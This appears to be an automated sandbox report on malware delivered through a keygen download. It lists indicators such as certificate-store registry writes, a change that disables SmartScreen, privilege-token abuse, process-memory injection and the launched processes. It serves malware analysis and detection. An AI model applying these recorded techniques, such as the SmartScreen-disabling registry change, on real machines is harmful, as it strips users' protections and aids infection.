0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 zjqs2pkwltw.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 jfiag3g_gg.exe -
Runs ping.exe 1 TTPs 12 IoCs
pid Process 496 PING.EXE 7660 PING.EXE 5148 PING.EXE 6408 PING.EXE 4604 PING.EXE 8624 PING.EXE 2640 PING.EXE 5804 PING.EXE 6916 PING.EXE 5864 PING.EXE 6092 PING.EXE 8148 PING.EXE -
Script User-Agent 40 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 1078 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1082 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1176 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1191 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 215 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 218 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 276 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1034 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 413 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 906 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1088 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 842 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 415 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 486 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 829 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 838 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 251 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1188 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 412 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 871 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1260 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 216 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 370 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 504 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 830 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1189 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1257 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 247 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 336 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 478 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 837 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1020 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1171 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1175 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 470 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 471 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 833 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1019 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2816 chrome.exe 2816 chrome.exe 3912 chrome.exe 3912 chrome.exe 4820 chrome.exe 4820 chrome.exe 4216 chrome.exe 4216 chrome.exe 4408 chrome.exe 4408 chrome.exe 4600 chrome.exe 4600 chrome.exe 4760 chrome.exe 4760 chrome.exe 4928 chrome.exe 4928 chrome.exe 4056 setups.tmp 4056 setups.tmp 4232 Conhost.exe 4232 Conhost.exe 3644 svchost.exe 3644 svchost.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 5100 multitimer.exe 1488 mt1fu32iu4k.tmp 1488 mt1fu32iu4k.tmp 5344 apipostback.exe 5344 apipostback.exe 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 4328 chrome.exe 4328 chrome.exe 5976 chrome.exe 5976 chrome.exe 6792 rundll32.exe 6792 rundll32.exe 6832 regsvr32.exe 6832 regsvr32.exe 6528 RunWW.exe 6528 RunWW.exe 2804 setups.tmp 2804 setups.tmp 6528 RunWW.exe 6528 RunWW.exe 6528 RunWW.exe 6528 RunWW.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2260 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 6584 6762a766.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 7972 6762a766.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 9460 1416094.exe 8516 4458909.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2608 Setup.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeTcbPrivilege 3644 svchost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 5100 multitimer.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeDebugPrivilege 4232 Conhost.exe Token: SeCreateTokenPrivilege 4744 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4744 askinstall20.exe Token: SeLockMemoryPrivilege 4744 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4744 askinstall20.exe Token: SeMachineAccountPrivilege 4744 askinstall20.exe Token: SeTcbPrivilege 4744 askinstall20.exe Token: SeSecurityPrivilege 4744 askinstall20.exe Token: SeTakeOwnershipPrivilege 4744 askinstall20.exe Token: SeLoadDriverPrivilege 4744 askinstall20.exe Token: SeSystemProfilePrivilege 4744 askinstall20.exe Token: SeSystemtimePrivilege 4744 askinstall20.exe Token: SeProfSingleProcessPrivilege 4744 askinstall20.exe Token: SeIncBasePriorityPrivilege 4744 askinstall20.exe Token: SeCreatePagefilePrivilege 4744 askinstall20.exe Token: SeCreatePermanentPrivilege 4744 askinstall20.exe Token: SeBackupPrivilege 4744 askinstall20.exe Token: SeRestorePrivilege 4744 askinstall20.exe Token: SeShutdownPrivilege 4744 askinstall20.exe Token: SeDebugPrivilege 4744 askinstall20.exe Token: SeAuditPrivilege 4744 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4744 askinstall20.exe Token: SeChangeNotifyPrivilege 4744 askinstall20.exe Token: SeRemoteShutdownPrivilege 4744 askinstall20.exe Token: SeUndockPrivilege 4744 askinstall20.exe Token: SeSyncAgentPrivilege 4744 askinstall20.exe Token: SeEnableDelegationPrivilege 4744 askinstall20.exe Token: SeManageVolumePrivilege 4744 askinstall20.exe Token: SeImpersonatePrivilege 4744 askinstall20.exe Token: SeCreateGlobalPrivilege 4744 askinstall20.exe Token: 31 4744 askinstall20.exe Token: 32 4744 askinstall20.exe Token: 33 4744 askinstall20.exe Token: 34 4744 askinstall20.exe Token: 35 4744 askinstall20.exe Token: SeDebugPrivilege 788 MicrosoftEdge.exe Token: SeDebugPrivilege 788 MicrosoftEdge.exe Token: SeDebugPrivilege 788 MicrosoftEdge.exe Token: SeDebugPrivilege 788 MicrosoftEdge.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeAuditPrivilege 2220 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2404 svchost.exe Token: SeIncreaseQuotaPrivilege 2404 svchost.exe Token: SeSecurityPrivilege 2404 svchost.exe Token: SeTakeOwnershipPrivilege 2404 svchost.exe Token: SeLoadDriverPrivilege 2404 svchost.exe Token: SeSystemtimePrivilege 2404 svchost.exe Token: SeBackupPrivilege 2404 svchost.exe Token: SeRestorePrivilege 2404 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 3912 chrome.exe 1488 mt1fu32iu4k.tmp 5300 Setup3310.tmp 5408 zjqs2pkwltw.exe 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5976 chrome.exe 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp 5228 vpn.tmp -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 644 Weather.exe 644 Weather.exe 644 Weather.exe 644 Weather.exe 644 Weather.exe 2260 Process not Found -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 788 MicrosoftEdge.exe 3160 MicrosoftEdgeCP.exe 3160 MicrosoftEdgeCP.exe 8068 google-game.exe 8068 google-game.exe 6928 google-game.exe 6928 google-game.exe 5844 MaskVPNUpdate.exe 8372 Full Version.exe 8372 Full Version.exe 5440 Full Version.exe 5440 Full Version.exe 2260 Process not Found 2260 Process not Found 2260 Process not Found 2260 Process not Found 2260 Process not Found 2260 Process not Found 2260 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3912 wrote to memory of 3232 3912 chrome.exe 71 PID 3912 wrote to memory of 3232 3912 chrome.exe 71 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2712 3912 chrome.exe 75 PID 3912 wrote to memory of 2816 3912 chrome.exe 76 PID 3912 wrote to memory of 2816 3912 chrome.exe 76 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 PID 3912 wrote to memory of 3960 3912 chrome.exe 77 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0" RegAsm.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 4112 attrib.exe 584 attrib.exe 4904 attrib.exe 7892 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:68
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/30f8668638112r4p2203.html1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff91ebf6e00,0x7ff91ebf6e10,0x7ff91ebf6e202⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:22⤵PID:2712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1868 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:12⤵PID:3960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:12⤵PID:3520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:2336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:1136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:82⤵PID:4192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:82⤵PID:4332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:82⤵PID:4556
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:4584
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a3ce7740,0x7ff6a3ce7750,0x7ff6a3ce77603⤵PID:4656
-
-
-
